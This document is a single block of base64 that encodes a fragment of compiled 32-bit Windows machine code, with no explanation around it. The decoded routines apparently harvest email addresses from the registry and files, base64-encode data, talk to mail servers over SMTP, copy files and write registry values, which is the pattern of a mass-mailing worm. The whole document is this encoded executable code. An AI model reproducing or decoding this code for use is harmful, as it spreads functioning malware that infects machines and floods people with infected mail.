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 /9ZozKAXNqNwrBc2/zWYrBc2/9aDPbCsFzYAo2ysFzZ0XGi4oBc2/zWYrBc2/9ZopKAXNqPg1Rc2 /zWYrBc2/9ZolKAXNqPQ1Rc2/zWYrBc2/9ZohKAXNqPc1Rc2/zWYrBc2/9ZodKAXNqPU1Rc2/zWY rBc2/9aj2NUXNusSaFygFzb/NZisFzb/1qPM1Rc2aFCgFzb/14XAo5ysFzZ1BzPA6YcCAABoQKAX NlD/1mg4oBc2o5SsFzb/14XAo6CsFzZ0VWgooBc2UP/WaBSgFzajkKwXNv81oKwXNv/WaASgFzaj jKwXNv81oKwXNv/WaOyfFzajiKwXNv81oKwXNv/WaNifFzajhKwXNv81oKwXNv/Wo4CsFzZozJ8X Nv/XhcCjpKwXNnR5aMCfFzZQ/9ZosJ8XNqP81hc2/zWkrBc2/9ZooJ8XNqP41hc2/zWkrBc2/9Zo kJ8XNqP01hc2/zWkrBc2/9ZogJ8XNqPw1hc2/zWkrBc2/9ZocJ8XNqPs1hc2/zWkrBc2/9ZoZJ8X NqPo1hc2/zWkrBc2/9aj5NYXNmhYnxc2/9eFwKOorBc2D4R1AQAAaEyfFzZQ/9ZoQJ8XNqNorBc2 /zWorBc2/9ZoMJ8XNqNkrBc2/zWorBc2/9ZoKJ8XNqNgrBc2/zWorBc2/9ZoIJ8XNqNcrBc2/zWo rBc2/9ZoGJ8XNqNYrBc2/zWorBc2/9ZoEJ8XNqNUrBc2/zWorBc2/9ZoBJ8XNqNQrBc2/zWorBc2 /9Zo/J4XNqNMrBc2/zWorBc2/9Zo9J4XNqNIrBc2/zWorBc2/9Zo7J4XNqNErBc2/zWorBc2/9Zo 4J4XNqNArBc2/zWorBc2/9Zo2J4XNqM8rBc2/zWorBc2/9Zo0J4XNqM4rBc2/zWorBc2/9ZoyJ4X NqM0rBc2/zWorBc2/9ZowJ4XNqMsrBc2/zWorBc2/9ZotJ4XNqMwrBc2/zWorBc2/9ZoqJ4XNqMo rBc2/zWorBc2/9ZonJ4XNqMkrBc2/zWorBc2/9ZojJ4XNqMcrBc2/zWorBc2/9ajIKwXNmiAnhc2 /zWorBc2/9ajGKwXNmoBWF9ew6GYrBc2Vos12IAXNoXAdANQ/9ahnKwXNoXAdANQ/9ahoKwXNoXA dANQ/9ahpKwXNoXAdANQ/9ahqKwXNoXAdANQ/9ZqAVhew1WL7IHsFAYAAFOLHRyAFzaNRfRWUDP2 aD8ADwBWaFChFzZoAgAAgP/ThcAPhdkAAABXVlZWjUX4iz0YgBc2VlCNhez9///HRfj/AAAAUFb/ dfSJdfz/14XAD4WhAAAAjYXs/v//aBihFzZQ6GolAACNhez9//9QjYXs/v//UOhpJQAAg8QQjUXw UGg/AA8AjYXs/v//VlBoAgAAgP/ThcB1Oo1F7MdF7AAEAABQjYXs+f//UFb/dfD/FQSAFzY5NbCs FzZ0DY2F7Pn//1Dolun//1n/dfD/FRCAFzb/RfxWVlaNRfhWUI2F7P3//1DHRfj/AAAA/3X8/3X0 6VX/////dfT/FRCAFzZfXlvJw1WL7IHsXAcAAFNWM/ZXOTWwrBc2D4TtAAAAjUXwx0X0/wAAAFBo PwAPAFZodKIXNmgCAACAx0X8/gEAAP8VHIAXNoXAD4XpAgAAjUX8iz0MgBc2UI2FpPz//1BWjUX0 VlCNhaT+//9QVv918Il1+P/XhcAPhYYAAACAvaX+//8kdEmLRfwz2zPSjUj8O852O4C8FaT8//9Q jYQVpfz//3UagDhhdRWAeAF0dQ+AeAJodQmAeAM9dQONWARCO9Fy0DvedAdT6Oft//9ZjUX8/0X4 UI2FpPz//1BWjUX0VlCNhaT+//9Qx0X0/wAAAP91+MdF/P4BAAD/dfDpcP////918OkmAgAAjUXg iXXgUI1F5FBWaD8ADwBWVlZoOKIXNmgCAACA/xUUgBc2hcAPhQACAABWVlaNRfBWiz0YgBc2UI2F pP7//1BW/3Xkx0Xw/wAAAIl1+P/Xix0IgBc2hcAPhe0AAACAvaX+//8kD4S3AAAAjYWg/f//aPyh FzZQ6EgjAACNhaT+//9QjYWg/f//UOhHIwAAg8QQjUX8UGg/AA8AjYWg/f//VlBoAgAAgP8VHIAX NoXAdXCNRejHRegABAAAUI2FpPj//1BWVmj0oRc2/3X8x0X0kgEAAP8VIIAXNo1F9GoEUGoEVmjs oRc2/3X8/9NWVmoDVmjgoRc2/3X8/9NWVmoDVmjUoRc2/3X8/9ONhaT4//9Q6JHs//9Z/3X8/xUQ gBc2/0X4VlZWjUXwVlCNhaT+//9Qx0Xw/wAAAP91+P915P/XhcAPhBP///+JdfSKRfRqD1m+mKEX No19pARD86WIRe+IRd2NReAz9lCNRfxQVmg/AA8AVlaNRaRWUGgCAACA/xUUgBc2hcAPhYUAAACh lKEXNmoEiUXoikXviEXoX41F+FdQV1Zo7KEXNv91/MdF+JIBAAD/01ZWagNWaOChFzb/dfz/01ZW agNWaNShFzb/dfz/041F6FdQagFWaPShFzb/dfz/01ZWagFWaIyhFzb/dfz/041F+FdQV1ZohKEX Nv91/Il1+P/T/3X8/xUQgBc2/0X0g330GA+CLP////915P8VEIAXNl9eW8nDVYvsg+wcU1Yz21dT izVsgBc2U2oDU2oBaAAAAICJXfT/dQj/1ov4g///D4SWAAAAU1f/FSyAFzaD+P+JRfh1CVf/FWCA FzbrfYPAEFBqCP81tKwXNv8VdKwXNjvDiUX8dN6NTfRTUf91+FBX/xV0gBc2hcBXdQj/FWCAFzbr N/8VYIAXNotF+GoDM9JZ9/E704lVCHQHUVgrwolFCFNTagRTagFoAAAAQP91DP/Wg/j/iUUMdRf/ dfxT/zW0rBc2/xVwrBc2M8DpMwEAAGoCU1NQ/xVogBc2i0X4M/8zyTldCGoDD5XBM9Je9/YDwTvD iUX4D4brAAAAi3X86wOLRfhIO/iJRfB1FTldCHQQg30IAXUEMtLrCTLSMsnrBopWAopOAYraigaA 4z+IXeeK2YDjD8DjAsDqBgraitCA4gOIXebA4gTA6QQK0cDoAohV5YhF5P915OipAAAA/3XliEXk 6J4AAAD/deaIReXokwAAAP9154hF5uiIAAAAg8QQO33wiEXndRcz2zldCHQSg30IAXQExkXmPcZF 5z3rAjPbjUXsU1CNReRqBFD/dQz/FWSAFzZHahOLxzPSWffxhdJ1FY1F7FNQagJorKIXNv91DP8V ZIAXNoPGAzt9+A+CGv////91/FP/NbSsFzb/FXCsFzb/dQz/FWCAFzZqAVhfXlvJw4pEJAQ8GXcD BEHDPBpyBzwzdwMER8M8NHIHPD13AwT8wzw+dQME7cM8Pw+VwEiD4C/DVYvsg+woU41F2Fcz21CJ XfD/FUiAFzYPt0XYD7dN2mnAbQEAAGvJHgPBagQPt03eA8FfiUX0jUXsUI1F/FBTaD8ADwBTU1No uKIXNmgBAACAiX34/xUUgBc2hcAPhYUAAACDfewCVnVSjUX4vrCiFzZQjUXoUFNTVv91/P8VIIAX NoXAdSCLReiDwAo7RfRzTP91+I1F9FBXU1b/dfz/FQiAFzbrMP91+I1F9FBXU1b/dfz/FQiAFzbr Iv91+I1F9FBXU2iwohc2/3X8/xUIgBc2hcB1B8dF8AEAAAD/dfz/FRCAFzZeOV3wiB1k1hc2X1t0 BegFAAAAagFYycNVi+yB7AgEAACNRfzHRfgABAAAUGg/AA8AagBoMJQXNmgBAACA/xUcgBc2hcB1 M41F+FCNhfj7//9QagBqAGiwohc2/3X8/xUggBc2/3X8/xUQgBc2jYX4+///UOgQAAAAWeizCQAA 6PEDAABqAVjJw4HsRAEAAFZXvwAEAABXagj/NbSsFzb/FXSsFzaL8IX2D4SaAQAAU1WLLTCBFzZX /7QkXAEAAFb/1VboM8L///+0JGgBAADoqR0AAIsdVIEXNovPK8hRaHyUFzZW/9ODxCCNRCQUUFb/ FYSAFzaD+P+JRCQQdQcz/+kwAQAAjUQkQFD/FViBFzaNRCRExwQkEJAXNlDobR0AAFmFwFkPhOYA AACNRCRAaHiUFzZQ6FQdAABZhcBZD4TNAAAA9kQkFBB0PFf/tCRcAQAAVv/VVuggHQAAi88ryFFo dJQXNlb/01boDR0AAIvPK8iNRCRgUVBW/9NW6Ab////phwAAAI1EJEBQ6OscAACD+ARZdnqNRCRA aBSeFzZQ6NYcAABZjUQEQFDo3RwAAFmFwFl0II1EJEBoBJ4XNlDothwAAFmNRARAUOi9HAAAWYXA WXU6V/+0JFwBAABW/9VW6JQcAACLzyvIUWh0lBc2Vv/TVuiBHAAAi88ryI1EJGBRUFb/01boQwAA AIPEMI1EJBRQ/3QkFP8VgIAXNoXAD4Xd/v///3QkEP8VfIAXNmoBX1ZqAP81tKwXNv8VcKwXNl2L x1tfXoHERAEAAMNVi+yB7AgBAABTVjPbV1NTagNTagNoAAAAgP91CIld+P8VbIAXNovwg/7/dDdT Vv8VLIAXNov4g///iX0IdB6B/wAAgAB3FldqCP81tKwXNv8VdKwXNjvDiUX8dQ5W/xVggBc2M8Dp 5AAAAI1N+FNRV1BW/xV0gBc2hcBWdQ3/FWCAFzYz9umyAAAA/xVggBc2M8kz9jP/OV0ID4aaAAAA i1X8igQXPHt9JTwtfiE8L3QdPDp8BDw/fhU8W3wEPF5+DTxgdAk8QHVmagFe62E783RZO/l2T4v3 K/GD/gJ2RoH+gAAAAHM+jUb/UI1EEQFQjYX4/v//UOg0GwAAjYQ1+P7//4PEDIhY/4C9+P7//0B0 E4B4/kB0DY2F+P7//1DoLwAAAFkz9ovP6wSLzzP2Rzt9CA+CZv///2oBXv91/FP/NbSsFzb/FXCs FzaLxl9eW8nDVYvsgeyAAAAAg30IAFNWizUA1xc2Vw+ErAAAAIs9MIEXNruAAAAAU41FgP91CFD/ 141FgFD/FViBFzaNRYBQ6JMaAACDxBSD+AOJRQh8eY1FgGpAUP8VaIEXNlmFwFl0Z4B9gEB0YYtF CIC8BX////9AdFSF9nQYjUWAVlDoZxoAAFmFwFl0QIu2gAAAAOvkaIQAAABqCP81tKwXNv8VdKwX NoXAdCGLDQDXFzZTiYiAAAAAjU2AUVCjANcXNv/Xg8QMagFY6wIzwF9eW8nDUzPbOR0A1xc2dQQz wFvDOB1k1hc2VnVE/xVggRc2a8Bkmbn/fwAA9/mLFQDXFzY704vKdPqL8EiF9nwMi4mAAAAAO8t1 7+vnaIAAAABRaGTWFzb/FTCBFzaDxAw5HQDXFzZ0L/81ANcXNuhSAAAAoQDXFzZZUFP/NbSsFzaL sIAAAAD/FXCsFzY784k1ANcXNnXRoQTXFzY7w3Qfi7AAAQAAUFP/NbSsFzb/FXCsFzaLxjvzowTX FzZ14WoBWF5bw1WL7IHsPAYAAFNWV/91COgzGQAAakD/dQj/FWiBFzaL8DPbg8QMO/MPhIEAAABW 6BMZAACD+AJZcnWNhcT6//9GUP81EKQXNlboCbX//4PEDI2FxPr//1D/FSCsFzaL8DvzdEtqEI1F 4FNQ6MsYAAAPv0YKUItGDP8wjUXkUOjKGAAAg8QYZsdF4AIAahlfV/8VOKwXNlNqAV5miUXiVmoC /xVcrBc2g/j/iUX8dQczwOm4AwAAiXX0jU30vn5mBIBRVlD/FRisFzaFwHQHM/bpjgMAAI1F4GoQ UP91/P8VWKwXNo1F9Ild9FBW/3X8/xUYrBc2hcB11b4ABAAAagqNhcT7//9WUP91/OhcBgAAg8QQ hcB0t4C9xPv//zJ1ro2FxPv//2g8oxc2UOgQGAAAWYBlxABZjUX4UI1FxFCJffj/FbSAFzaNRcRo +AMAAFCNhcT7//9Q/xVUgRc2jYXE+///aKyiFzZQ6OQXAACNhcT7//9WUI2FxPv//1D/dfzoqAUA AIPEJIXAD4Q9////gL3E+///Mg+FMP///42FxPv//2gsoxc2UOiSFwAAu2TWFzaNhcT7//9TUOiS FwAAvyijFzaNhcT7//9XUOiAFwAAjYXE+///VlCNhcT7//9Q/3X86EQFAACDxCiFwA+E2f7//4C9 xPv//zIPhcz+//+NhcT7//9oHKMXNlDoLhcAAP91CI2FxPv//1DoMRcAAI2FxPv//1dQ6CQXAACN hcT7//9WUI2FxPv//1D/dfzo6AQAAIPEKIXAD4R9/v//gL3E+///Mg+FcP7//42FxPv//2gUoxc2 UOjSFgAAjYXE+///VlCNhcT7//9Q/3X86KgEAACDxBiFwA+EPf7//4C9xPv//zMPhTD+//+NhcT7 //9oDKMXNlDokhYAAI2FxPv//1NQ6JcWAACNhcT7//9XUOiKFgAAjYXE+///aACjFzZQ6HkWAACN hcT5//9Q6I0BAACNhcT5//9QjYXE+///UOhaFgAAjYXE+///aKyiFzZQ6EkWAACDxDSNhcT7//9q PFDoLBYAAFlQjYXE+///UP91/OjhBAAAg8QQhcAPhJf9//8z/1dXagNXagdoAAAAgGi4yBc2/xVs gBc2i9iD+/+JXQgPhHD9//9XU/8VLIAXNoP4/4lF+HUMU/8VYIAXNulU/f//g8AQUGoI/zW0rBc2 /xV0rBc2i9g733UF/3UI69iNRfBXUIl98P91+FP/dQj/FXSAFzb/dQiFwHUZ/xVggBc2U1f/NbSs Fzb/FXCsFzbpAv3///8VYIAXNmo8/3X4U/91/OgtBAAAg8QQhcBTV/81tKwXNnTS/xVwrBc2jYXE +///aPyiFzZQ6DsVAACNhcT7//9WUI2FxPv//1D/dfzoEQMAAIPEGIXAD4Sm/P//gL3E+///Mg+F mfz//42FxPv//2j0ohc2UOj7FAAAjYXE+///VlCNhcT7//9Q/3X86NECAACDxBhqAV7/dfz/FTys FzaLxl9eW8nDoQTXFzZWhcB0CYO4AAEAAAB1LuhHu///vhioFzZqLlb/FWiBFzZZhcBZdAOAIABo /wAAAFb/dCQQ/xVUgRc260D/FWCBFzZrwGSZuf9/AAD3+YsNBNcXNoXJi9F0+ovwSIX2fAyLkgAB AACF0nXv6+doAAEAAFL/dCQQ/xUwgRc2g8QMagFYXsNVi+yB7AgCAABXjUX4M/9QV2oCV2hEoxc2 V4l9+P8V/NYXNoXAdAczwOloAQAAjYX4/f//gKX4/f//AFBXjYX4/f//aABAAABQV1f/dfj/FfTW FzaFwA+FKwEAAFNWjUX8UGgACAAAjYX4/f//V1BX/3X4/xXw1hc2hcAPhdEAAACLRfw7xw+ExgAA AItABDvHdAdQ6AABAABZi0X8i0AcO8d0OotwDDv3dDNW6JoTAACD+AZZdieAPlN1IoB+AU11HIB+ AlR1FoB+A1B1EIB+BDp1CoPGBVbol/j//1mLTfwz24tBJDvHdGg7WSBzYQPHhcB0TYtwDIX2dEZW 6EkTAACD+AZZdjqAPlN1NYB+AU11L4B+AlR1KYB+A1B1I4B+BDp1HYPGBVboRvj//2iAAAAAVmhk 1hc2/xUwgRc2g8QQi038Q4PHGItBJIXAdZoz//91/P8V7NYXNo2F+P3//4l9/FBXjYX4/f//aABA AABQV1f/dfj/FfTWFzaFwA+E2f7//15bV1dX/3X4/xXk1hc2agFYX8nDVYvsgewAAQAAg30IAFaL NQTXFzZXdHyLPTCBFzZo/wAAAP91CI2FAP///1D/14PEDIBl/wCF9nQbjYUA////VlDofhIAAFmF wFl0R4u2AAEAAOvhaAQBAABqCP81tKwXNv8VdKwXNoXAdCiLDQTXFzZoAAEAAImIAAEAAI2NAP// /1FQowTXFzb/14PEDGoBWOsCM8BfXsnDVYvsajz/dQzoDBIAAFlQ/3UM/3UI6MUAAACDxBCFwHUC XcNqPP91FP91EP91COgLAAAAg8QQ99gbwPfYXcNVi+yB7AwBAABTVleLfQwz2zP2iB9qCI1F+FNQ 6K4RAACLRRSDxAyJRfiLRQiJhfj+//+NRfhQU42F9P7//1NQU8eF9P7//wEAAAD/FUCsFzY7w3RF g/j/dECNhfT+//9Q/3UI/xVgrBc2hcB0LItFEFMrxkhQjQQ+UP91CP8VUKwXNoP4/3QSO8N0DgPw gHw+/wp1gGoBWOsCM8BfXlvJw1WL7IHsDAEAAFNWV4t9CDPbM/ZqCI1F+FNQ6A8RAACDxAyNRfjH Rfg8AAAAib34/v//UI2F9P7//1NQU1PHhfT+//8BAAAA/xVArBc2O8N0QIP4/3Q7jYX0/v//UFf/ FWCsFzaFwHQpi0UQUyvGUItFDAPGUFf/FUisFzaD+P90EDvDdAcD8Dt1EHyHagFY6wIzwF9eW8nD UVNVVjP2V1ZoAAAIAFaJNbSsFzb/FTiAFzY7xqO0rBc2D4SRAQAA/3QkGOhoBwAAg/gBWaMI1xc2 dE7/dCQY6JAGAACLNayAFzaLPTyAFzaFwFm9mJQXNru3AAAAdVszwDkFCNcXNnVRVVBQ/9aJRCQQ /9c7w3Uig3wkEAB0Cv90JBD/FWCAFzb/NbSsFzb/FUyAFzbpHgEAAP90JBD/FWCAFzb/dCQY6BYB AABZ/zW0rBc2/xVMgBc26Ozk//+DPQjXFzYAdQXoCt3//1VqAGoA/9aL8P/XO8N1KYX2dAdW/xVg gBc2/xVkrBc26Ijp////NbSsFzb/FUyAFzZqAOmtAAAAVv8VYIAXNjP2OTUI1xc2dWJodJ4XNmi4 zBc2/xVEgRc2WYXAWXVM/3QkGOiOAAAAWf8VoIAXNlD/FSyBFzZZ/xVggRc2a8Bkmbn/fwAA9/mD +FB+BeiFBAAA/xVkrBc26BDp////NbSsFzb/FUyAFzbrOejhAQAA6PkCAAA5NQjXFzZ1BeifuP// OTWwrBc2dAmDPQjXFzZjdQZW6BG6////FWSsFzboyej//1b/FUSAFzZqAVhfXl1bWcIMAFWL7IHs VAgAAFNWV/91COj9BAAAhcBZv7i0FzYPhYoAAADozuT//74ABAAAu7iwFzZWU/8V+IAXNlPoHrP/ /1m7uKwXNlZT/xUkgRc2U+gKs///WVdW/xUUgRc2V+j7sv//Wf8VIIEXNlBouMwXNuhlDgAAWbu4 0Bc2WVNW/xUcgRc2U+jUsv//xwQkUKAXNv8VWIAXNmhAoBc2UKOcrBc2/xVQgBc2o5SsFzaLHRiB FzaNhaz7//9oAAIAAFD/dQj/0zP2hcB1D42FrPv//2gAAgAAUFb/042FrP3//1BWaDCeFzZX/xX8 gBc2jYWs/f//aCieFzZQ6O4NAABZjYWs/f//WVZQjYWs+///UP8V3IAXNo2FrP3//2oBUOhws/// akSNRaxfV1ZQ6KMNAABqEI1F8FZQ6JcNAACNhaz9//+JfaxQjYWs9///UGaJddzogw0AAI2FrPf/ /2hMoxc2UOiEDQAAg8QwjUXwUI1FrFBWVlZWVo2FrPf//1ZQVv8VBIEXNo2FrP3//1Do9rH//1lq AVhfXlvJw1WL7IPsDFNWV+iRr///u7jEFzYz9lNWaDCeFzZouLQXNv8V/IAXNlP/FRCBFzZoKJ4X NlPoFw0AAFlZVlNouMAXNv8V3IAXNmiAAAAAU/8VeIAXNlZT/xUIgRc2vlyjFzaNffSlpGoBjU30 X4lF/FdRaAQIAABqZmoKUP8V8IAXNjP2Vv91/P8V7IAXNlZT6GOy//9T6FOx//+DxAxWVmoDVmoD aAAAAMBT/xVsgBc2i9iD+/90X1ZWaNAAAABT/xVogBc2g/j/dEU5NRCkFzZ1GI1F/FZQagRoEKQX NlOJdfz/FXSAFzbrFo1F/FZQagRoEKQXNlOJdfz/FWSAFzaFwHULU/8VYIAXNjPA6wlT/xVggBc2 i8dfXlvJw4HsEAQAAFNVVo1EJBxXM9tQU2gwnhc2aLi0Fzb/FfyAFzaNRCQgU1BouMAXNv8V3IAX Nr2AAAAAjUQkIFVQ/xV4gBc2jUQkIFNQ/xUIgRc2vlyjFzaNfCQYjUwkGGoBpVFoBAgAAGpmagpQ iUQkKKT/FfCAFzZT/3QkFP8V7IAXNr64yBc2VlNoMJ4XNmi4tBc2/xX8gBc2iz1sgBc2U1VqAlNT aAAAAEBW/9eD+P+JRCQQdRJWizUQgRc2/9aNRCQgUP/W61+NRCQUU1BoAJEXNuhQCwAAWVBoAJEX Nv90JCD/FWSAFzb/dCQQ/xVggBc2jUQkIFZQ6JDp//9ZjUQkJFlQ/xUQgRc2U1VqBFNTaAAAAEBW /9eL+IP//3ULVv8VEIEXNjPA6zRqAlNTV/8VaIAXNo1EJBRTvtCTFzZQVolcJCDo3QoAAFlQVlf/ FWSAFzZX/xVggBc2agFYX15dW4HEEAQAAMOB7EQBAABTVVZXvwAEAABXagj/NbSsFzb/FXSsFzaL 8IX2D4S9AAAAvbi0FzZXVVb/FTCBFzZW6ACv//9V6HwKAACLHVSBFzaLzyvIUWhkoxc2Vv/Tg8Qg jUQkFFBW/xWEgBc2g/j/iUQkEHURVmoA/zW0rBc2/xVwrBc262RXVVb/FTCBFzZW6DEKAACLzyvI UWh0lBc2Vv/TVugeCgAAi88ryI1EJGBRUFb/04PELFb/FRCBFzaNRCQUUP90JBT/FYCAFzaFwHW0 VlD/NbSsFzb/FXCsFzb/dCQQ/xV8gBc2agFYX15dW4HERAEAAMNVi+yB7CAEAABTVos1GIEXNleA 